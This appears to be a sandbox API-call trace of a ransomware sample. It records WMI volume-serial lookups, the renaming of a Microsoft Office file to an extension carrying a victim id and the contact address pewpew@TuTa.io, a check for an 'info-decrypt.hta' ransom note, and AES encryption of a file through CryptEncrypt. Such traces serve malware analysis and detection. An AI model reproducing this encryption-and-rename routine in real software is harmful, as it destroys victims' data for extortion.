WbemLocator:IUnknown:QueryInterface (in: This=0x603305c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8ea74 | out: ppvObject=0x6d8ea74*=0xb5bc74) returned 0x0 [0160.066] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5bc74, pProxy=0x603305c, pAuthnSvc=0x6d8eac4, pAuthzSvc=0x6d8eac0, pServerPrincName=0x6d8eab8, pAuthnLevel=0x6d8eabc, pImpLevel=0x6d8eaac, pAuthInfo=0x6d8eab0, pCapabilites=0x6d8eab4 | out: pAuthnSvc=0x6d8eac4*=0xa, pAuthzSvc=0x6d8eac0*=0x0, pServerPrincName=0x6d8eab8, pAuthnLevel=0x6d8eabc*=0x6, pImpLevel=0x6d8eaac*=0x2, pAuthInfo=0x6d8eab0, pCapabilites=0x6d8eab4*=0x1) returned 0x0 [0160.066] WbemLocator:IUnknown:Release (This=0xb5bc74) returned 0x1 [0160.066] WbemLocator:IUnknown:QueryInterface (in: This=0x603305c, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8ea68 | out: ppvObject=0x6d8ea68*=0xb5bc94) returned 0x0 [0160.066] WbemLocator:IUnknown:QueryInterface (in: This=0x603305c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8ea64 | out: ppvObject=0x6d8ea64*=0xb5bc74) returned 0x0 [0160.066] WbemLocator:IClientSecurity:SetBlanket (This=0xb5bc74, pProxy=0x603305c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0160.067] WbemLocator:IUnknown:Release (This=0xb5bc74) returned 0x2 [0160.067] WbemLocator:IUnknown:Release (This=0xb5bc94) returned 0x1 [0160.067] CoTaskMemFree (pv=0xbd4a08) [0160.067] WbemLocator:IUnknown:Release (This=0x6024c00) returned 0x0 [0160.067] WbemLocator:IUnknown:QueryInterface (in: This=0x603305c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e664 | out: ppvObject=0x6d8e664*=0xb5bc94) returned 0x0 [0160.067] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bc94, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e620 | out: ppvObject=0x6d8e620*=0x0) returned 0x80004002 [0160.068] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bc94, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8e43c | out: ppvObject=0x6d8e43c*=0x0) returned 0x80004002 [0160.069] WbemLocator:IUnknown:AddRef (This=0xb5bc94) returned 0x3 [0160.069] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bc94, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8df7c | out: ppvObject=0x6d8df7c*=0x0) returned 0x80004002 [0160.069] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bc94, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8df2c | out: ppvObject=0x6d8df2c*=0x0) returned 0x80004002 [0160.072] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bc94, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8df38 | out: ppvObject=0x6d8df38*=0xb5bbf4) returned 0x0 [0160.072] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5bbf4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6d8df40 | out: pCid=0x6d8df40*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0160.072] WbemLocator:IUnknown:Release (This=0xb5bbf4) returned 0x3 [0160.072] CoGetContextToken (in: pToken=0x6d8df98 | out: pToken=0x6d8df98) returned 0x0 [0160.072] CoGetContextToken (in: pToken=0x6d8e3a0 | out: pToken=0x6d8e3a0) returned 0x0 [0160.072] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bc94, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e430 | out: ppvObject=0x6d8e430*=0xb5bc7c) returned 0x0 [0160.072] WbemLocator:IRpcOptions:Query (in: This=0xb5bc7c, pPrx=0xb5bc94, dwProperty=2, pdwValue=0x6d8e458 | out: pdwValue=0x6d8e458) returned 0x80004002 [0160.072] WbemLocator:IUnknown:Release (This=0xb5bc7c) returned 0x3 [0160.072] WbemLocator:IUnknown:Release (This=0xb5bc94) returned 0x2 [0160.072] CoGetContextToken (in: pToken=0x6d8e978 | out: pToken=0x6d8e978) returned 0x0 [0160.072] CoGetContextToken (in: pToken=0x6d8e8d8 | out: pToken=0x6d8e8d8) returned 0x0 [0160.073] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bc94, riid=0x6d8e9a8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x6d8e9a4 | out: ppvObject=0x6d8e9a4*=0x603305c) returned 0x0 [0160.073] WbemLocator:IUnknown:AddRef (This=0x603305c) returned 0x4 [0160.073] WbemLocator:IUnknown:Release (This=0x603305c) returned 0x3 [0160.073] WbemLocator:IUnknown:Release (This=0x603305c) returned 0x2 [0160.073] SysStringLen (param_1=0x0) returned 0x0 [0160.073] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60261e0, puCount=0x6d8ed3c | out: puCount=0x6d8ed3c*=0x0) returned 0x0 [0160.073] WbemDefPath:IWbemPath:GetText (in: This=0x60261e0, lFlags=2, puBuffLength=0x6d8ed38*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ed38*=0x20, pszText=0x0) returned 0x0 [0160.073] WbemDefPath:IWbemPath:GetText (in: This=0x60261e0, lFlags=2, puBuffLength=0x6d8ed38*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6d8ed38*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0160.073] CoGetContextToken (in: pToken=0x6d8e9a8 | out: pToken=0x6d8e9a8) returned 0x0 [0160.073] WbemLocator:IUnknown:AddRef (This=0xb5bc94) returned 0x3 [0160.073] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bc94, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e83c | out: ppvObject=0x6d8e83c*=0xb5bc94) returned 0x0 [0160.073] WbemLocator:IUnknown:Release (This=0xb5bc94) returned 0x3 [0160.073] WbemLocator:IUnknown:Release (This=0xb5bc94) returned 0x2 [0160.073] WbemDefPath:IWbemPath:GetText (in: This=0x60261e0, lFlags=2, puBuffLength=0x6d8ed40*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ed40*=0x20, pszText=0x0) returned 0x0 [0160.073] WbemDefPath:IWbemPath:GetText (in: This=0x60261e0, lFlags=2, puBuffLength=0x6d8ed40*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6d8ed40*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0160.073] IWbemServices:GetObject (in: This=0x603305c, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x6d8ecf4*=0x0, ppCallResult=0x0 | out: ppObject=0x6d8ecf4*=0x6027b20, ppCallResult=0x0) returned 0x0 [0161.307] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6026250, puCount=0x6d8ecf4 | out: puCount=0x6d8ecf4*=0x2) returned 0x0 [0161.307] WbemDefPath:IWbemPath:GetText (in: This=0x6026250, lFlags=4, puBuffLength=0x6d8ecf0*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ecf0*=0xf, pszText=0x0) returned 0x0 [0161.307] WbemDefPath:IWbemPath:GetText (in: This=0x6026250, lFlags=4, puBuffLength=0x6d8ecf0*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ecf0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0161.307] IWbemClassObject:Get (in: This=0x6027b20, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6d8ecf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36e72d4*=0, plFlavor=0x36e72d8*=0 | out: pVal=0x6d8ecf0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36e72d4*=8, plFlavor=0x36e72d8*=0) returned 0x0 [0161.307] SysStringByteLen (bstr="9C354B42") returned 0x10 [0161.307] SysStringByteLen (bstr="9C354B42") returned 0x10 [0161.307] IWbemClassObject:Get (in: This=0x6027b20, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6d8ecf8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36e72d4*=8, plFlavor=0x36e72d8*=0 | out: pVal=0x6d8ecf8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36e72d4*=8, plFlavor=0x36e72d8*=0) returned 0x0 [0161.307] SysStringByteLen (bstr="9C354B42") returned 0x10 [0161.307] SysStringByteLen (bstr="9C354B42") returned 0x10 [0161.307] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE", nBufferLength=0x105, lpBuffer=0x6d8e8f8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE", lpFilePart=0x0) returned 0x44 [0161.307] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x6d8e8f8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x67 [0161.307] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ed58) returned 1 [0161.308] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe"), fInfoLevelId=0x0, lpFileInformation=0x6d8edd4 | out: lpFileInformation=0x6d8edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28305200, ftCreationTime.dwHighDateTime=0x1c2f1c2, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x1c01fe00, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0161.308] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ed54) returned 1 [0161.308] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0161.309] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest", nBufferLength=0x105, lpBuffer=0x6d8e910, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest", lpFilePart=0x0) returned 0x4d [0161.309] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6d8e918, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\info-decrypt.hta", lpFilePart=0x0) returned 0x48 [0161.309] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ed78) returned 1 [0161.309] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\info-decrypt.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6d8edf4 | out: lpFileInformation=0x6d8edf4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b6e68c0, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x1b6e68c0, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x1b6e68c0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0161.309] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ed74) returned 1 [0161.309] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest", nBufferLength=0x105, lpBuffer=0x6d8e918, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest", lpFilePart=0x0) returned 0x4d [0161.309] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8edc4) returned 1 [0161.309] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest"), fInfoLevelId=0x0, lpFileInformation=0x36e7928 | out: lpFileInformation=0x36e7928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3acd3b00, ftCreationTime.dwHighDateTime=0x1c6cca0, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x3acd3b00, ftLastWriteTime.dwHighDateTime=0x1c6cca0, nFileSizeHigh=0x0, nFileSizeLow=0x236)) returned 1 [0161.309] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8edc0) returned 1 [0161.309] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest", nBufferLength=0x105, lpBuffer=0x6d8e804, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest", lpFilePart=0x0) returned 0x4d [0161.309] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ecf8) returned 1 [0161.309] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0161.310] GetFileType (hFile=0x4d0) returned 0x1 [0161.310] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ecf4) returned 1 [0161.310] GetFileType (hFile=0x4d0) returned 0x1 [0161.310] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x6d8ee00 | out: lpFileSizeHigh=0x6d8ee00*=0x0) returned 0x236 [0161.310] ReadFile (in: hFile=0x4d0, lpBuffer=0x36e7dbc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6d8edac, lpOverlapped=0x0 | out: lpBuffer=0x36e7dbc*, lpNumberOfBytesRead=0x6d8edac*=0x236, lpOverlapped=0x0) returned 1 [0161.311] CloseHandle (hObject=0x4d0) returned 1 [0161.311] CryptAcquireContextW (in: phProv=0x6d8ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6d8ed4c*=0xbe0cf0) returned 1 [0161.312] CryptGenRandom (in: hProv=0xbe0cf0, dwLen=0x10, pbBuffer=0x36e9110 | out: pbBuffer=0x36e9110) returned 1 [0161.873] CryptImportKey (in: hProv=0xbe0cf0, pbData=0x38d1760, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6d8ed1c | out: phKey=0x6d8ed1c*=0xb7f610) returned 1 [0161.873] CryptContextAddRef (hProv=0xbe0cf0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0161.873] CryptContextAddRef (hProv=0xbe0cf0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0161.873] CryptDuplicateKey (in: hKey=0xb7f610, pdwReserved=0x0, dwFlags=0x0, phKey=0x6d8ed0c | out: phKey=0x6d8ed0c*=0xb7f9d0) returned 1 [0161.873] CryptContextAddRef (hProv=0xbe0cf0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0161.873] CryptSetKeyParam (hKey=0xb7f9d0, dwParam=0x4, pbData=0x38d1840*=0x1, dwFlags=0x0) returned 1 [0161.873] CryptSetKeyParam (hKey=0xb7f9d0, dwParam=0x1, pbData=0x38d180c, dwFlags=0x0) returned 1 [0161.873] CryptEncrypt (in: hKey=0xb7f9d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x38d1850*, pdwDataLen=0x6d8ed78*=0x240, dwBufLen=0x240 | out: pbData=0x38d1850*, pdwDataLen=0x6d8ed78*=0x240) returned 1 [0161.873] CryptEncrypt (in: hKey=0xb7f9d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x38d1ab4*, pdwDataLen=0x6d8ed80*=0x0, dwBufLen=0x10 | out: pbData=0x38d1ab4*, pdwDataLen=0x6d8ed80*=0x10) returned 1 [0161.874] CryptDestroyKey (hKey=0xb7f610) returned 1 [0161.874] CryptReleaseContext (hProv=0xbe0cf0, dwFlags=0x0) returned 1 [0161.875] CryptReleaseContext (hProv=0xbe0cf0, dwFlags=0x0) returned 1 [0161.875] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest", nBufferLength=0x105, lpBuffer=0x6d8e7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest", lpFilePart=0x0) returned 0x4d [0161.875] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ece4) returned 1 [0161.875] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x45c [0161.876] GetFileType (hFile=0x45c) returned 0x1 [0161.876] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ece0) returned 1 [0161.876] GetFileType (hFile=0x45c) returned 0x1 [0161.876] WriteFile (in: hFile=0x45c, lpBuffer=0x38d20f8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x6d8ed74, lpOverlapped=0x0 | out: lpBuffer=0x38d20f8*, lpNumberOfBytesWritten=0x6d8ed74*=0x20, lpOverlapped=0x0) returned 1 [0161.877] CloseHandle (hObject=0x45c) returned 1 [0161.877] CoTaskMemAlloc (cb=0x20c) returned 0x66cc750 [0161.877] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x66cc750 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0161.877] CoTaskMemFree (pv=0x66cc750) [0161.877] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6d8e7d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0161.877] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8ed20 | out: ppv=0x6d8ed20*=0xb51e34) returned 0x0 [0161.877] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6d8ed18 | out: pAptType=0x6d8ed18*=1) returned 0x0 [0161.877] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6d8ed1c | out: ppvObject=0x6d8ed1c*=0x0) returned 0x80004002 [0161.878] IUnknown:Release (This=0xb51e34) returned 0x1 [0161.878] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8e688 | out: ppv=0x6d8e688*=0x6027600) returned 0x0 [0161.878] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027600, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8e8a0 | out: ppvObject=0x6d8e8a0*=0x0) returned 0x80004002 [0161.878] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027600, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e8b4 | out: ppvObject=0x6d8e8b4*=0x6030860) returned 0x0 [0161.878] WbemDefPath:IUnknown:Release (This=0x6027600) returned 0x0 [0161.878] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030860, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e4d4 | out: ppvObject=0x6d8e4d4*=0x6030860) returned 0x0 [0161.879] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030860, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e490 | out: ppvObject=0x6d8e490*=0x0) returned 0x80004002 [0161.879] WbemDefPath:IUnknown:AddRef (This=0x6030860) returned 0x3 [0161.879] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030860, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8ddec | out: ppvObject=0x6d8ddec*=0x0) returned 0x80004002 [0161.879] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030860, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8dd9c | out: ppvObject=0x6d8dd9c*=0x0) returned 0x80004002 [0161.879] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030860, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8dda8 | out: ppvObject=0x6d8dda8*=0x66ccbc8) returned 0x0 [0161.879] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ccbc8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6d8ddb0 | out: pCid=0x6d8ddb0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0161.879] WbemDefPath:IUnknown:Release (This=0x66ccbc8) returned 0x3 [0161.879] CoGetContextToken (in: pToken=0x6d8de08 | out: pToken=0x6d8de08) returned 0x0 [0161.879] CoGetContextToken (in: pToken=0x6d8e210 | out: pToken=0x6d8e210) returned 0x0 [0161.879] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030860, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e2a0 | out: ppvObject=0x6d8e2a0*=0x0) returned 0x80004002 [0161.879] WbemDefPath:IUnknown:Release (This=0x6030860) returned 0x2 [0161.879] WbemDefPath:IUnknown:Release (This=0x6030860) returned 0x1 [0161.879] CoGetContextToken (in: pToken=0x6d8eb98 | out: pToken=0x6d8eb98) returned 0x0 [0161.879] CoGetContextToken (in: pToken=0x6d8eaf8 | out: pToken=0x6d8eaf8) returned 0x0 [0161.879] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030860, riid=0x6d8ebc8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6d8ebc4 | out: ppvObject=0x6d8ebc4*=0x6030860) returned 0x0 [0161.879] WbemDefPath:IUnknown:AddRef (This=0x6030860) returned 0x3 [0161.879] WbemDefPath:IUnknown:Release (This=0x6030860) returned 0x2 [0161.879] WbemDefPath:IWbemPath:SetText (This=0x6030860, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0161.879] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030860, puCount=0x6d8ed4c | out: puCount=0x6d8ed4c*=0x0) returned 0x0 [0161.879] WbemDefPath:IWbemPath:GetText (in: This=0x6030860, lFlags=2, puBuffLength=0x6d8ed48*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ed48*=0x20, 